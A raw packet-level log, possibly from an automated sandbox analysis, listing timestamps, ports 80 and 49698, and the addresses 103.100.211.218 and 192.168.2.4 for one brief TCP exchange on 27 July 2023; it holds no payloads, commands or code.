Jul 27, 2023 20:19:07.017492056 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017512083 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017518044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017539024 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017544031 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017556906 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017570019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017575979 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017596006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017621040 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017647028 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017674923 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017702103 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017724991 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017724991 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017724991 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017724991 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017724991 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017729044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017746925 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017755985 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017769098 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017782927 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017805099 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017810106 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017817020 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017836094 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017857075 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017862082 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017884016 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017889023 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017910957 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017915010 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017926931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017941952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017967939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.017980099 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.017996073 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018022060 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018022060 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018044949 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018049002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018068075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018085957 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018095016 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018117905 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018121958 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018151999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018160105 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018184900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018186092 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018205881 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018227100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018229008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018260956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018280983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018296957 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018305063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018332005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018354893 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018368006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018374920 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018409014 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018410921 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018449068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018477917 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018488884 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018506050 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018546104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018548012 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018589020 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018603086 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018626928 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018636942 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018665075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018667936 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018706083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018711090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018742085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018747091 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018785000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018811941 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018819094 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018855095 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018855095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018874884 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018896103 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018899918 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018934011 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.018940926 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.018974066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019011974 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019052029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019089937 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019119978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019119978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019124985 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019155979 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019159079 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019164085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019196987 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019197941 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019237041 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019275904 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019303083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019311905 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019330025 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019344091 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019356966 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019382954 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019409895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019413948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019413948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019438982 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019448996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019448996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019467115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019495010 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019520998 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019524097 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019546986 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019547939 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019575119 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019601107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019603014 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019603014 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019628048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019638062 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019654036 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019670010 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019680023 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019682884 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019711018 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019737005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019738913 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019738913 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019759893 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019762993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019788027 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019789934 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019812107 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019815922 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019835949 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019841909 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019860983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019869089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019892931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019896030 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019917011 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019918919 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019946098 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019956112 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.019972086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.019998074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020010948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020010948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020023108 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020030975 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020050049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020051003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020070076 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020076990 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020102978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020142078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020169020 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020180941 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020180941 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020195007 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020220995 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020221949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020247936 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020248890 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020272970 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020298004 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020332098 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020351887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020360947 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020371914 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020396948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020409107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020410061 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020438910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020466089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020477057 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020500898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020504951 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020533085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020534992 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020565033 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.020572901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.020831108 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.287905931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.287976027 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288023949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288070917 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288121939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288080931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288080931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288167953 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288217068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288218975 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288217068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288254976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288314104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288326979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288336992 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288377047 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288424969 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288449049 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288475037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288538933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288547039 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288589954 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288635015 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288638115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288686991 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288733006 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288737059 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288786888 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288830042 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288832903 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288880110 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288927078 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.288942099 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.288975000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289016962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289025068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289072037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289119005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289119959 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289166927 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289210081 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289213896 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289261103 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289304018 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289307117 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289354086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289391994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289398909 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289438963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289479017 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289484978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289534092 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289580107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289594889 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289628983 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289673090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289674997 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289725065 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289768934 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289772034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289819002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289860010 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289865971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289915085 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.289956093 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.289963007 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290011883 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290059090 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290066957 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290107012 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290154934 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290157080 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290203094 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290246010 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290251970 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290298939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290344954 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290345907 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290391922 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290435076 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290450096 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290518999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290569067 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290569067 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290615082 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290656090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290663004 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290714025 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290752888 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290760994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290811062 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290857077 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290858030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290905952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.290949106 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.290956974 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291003942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291045904 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291049957 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291099072 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291141987 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291145086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291193008 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291233063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291239023 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291287899 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291327953 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291336060 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291383028 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291425943 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291429996 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291476965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291518927 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291523933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291570902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291606903 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291616917 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291665077 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291698933 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291713953 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291760921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291805983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291807890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291855097 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291896105 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291901112 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291949034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.291985989 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.291996002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292045116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292084932 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.292092085 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292138100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292177916 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.292184114 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292232037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292279959 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.292306900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292354107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292396069 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.292402029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.292448997 CEST	80	49698	103.100.211.218	192.168.2.4
